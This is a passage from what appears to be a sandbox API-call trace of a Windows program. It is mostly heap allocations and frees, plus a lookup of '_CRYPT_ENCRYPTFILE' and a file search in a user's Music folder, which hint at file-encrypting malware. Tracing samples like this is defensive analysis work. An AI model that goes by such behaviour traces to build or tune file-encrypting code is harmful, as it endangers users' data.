wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0111.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0111.471] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0111.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0111.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0111.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0111.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0111.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0111.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0111.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0111.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0111.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0111.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0111.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0111.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0111.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0111.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0111.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0111.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0111.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0111.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0111.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0111.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0111.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0111.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0111.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0111.472] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0111.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0111.472] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0111.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0111.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0111.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0111.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0111.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0111.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0111.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0111.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0111.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0111.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0111.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0111.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0111.473] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0111.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0111.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0111.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0111.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2f8 [0111.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca2f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0111.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0111.473] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0111.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0111.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0111.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0111.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0111.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0111.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0111.474] CloseHandle (hObject=0x258) returned 1 [0111.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0111.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0111.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0111.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0111.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0111.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0111.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0111.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0111.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0111.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0111.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0111.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0111.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0111.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0111.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0111.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0111.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0111.474] FreeLibrary (hLibModule=0x772d0000) returned 1 [0111.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0111.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0111.475] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0111.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0111.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0111.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0111.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0111.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0111.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0111.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0111.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0111.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0111.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0111.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0111.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0111.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0111.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0111.476] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0111.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0111.476] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0111.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0111.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0111.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0111.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0111.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0111.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0111.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0111.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0111.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0111.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2430 [0111.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0111.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0111.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0111.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0111.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0111.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0111.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2440 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0111.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2470 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0111.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ec0 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0111.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0111.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0111.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0111.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0111.478] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0111.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0111.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0111.478] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0111.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0111.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0111.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0111.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0111.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0111.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0111.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0111.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0111.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0111.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0111.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0111.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0111.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0111.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0111.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0111.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0111.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0111.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0111.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0111.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0111.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0111.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0111.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0111.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0111.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0111.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0111.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0111.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0111.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0111.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0111.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0111.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0111.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0111.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0111.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0111.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0111.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0111.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0111.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0111.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0111.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0111.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0111.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0111.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0111.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0111.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0111.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0111.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0111.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0111.481] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\7eNkYBcGM pJGAedeLc.mp3", lpFindFileData=0x144ead0 | out: 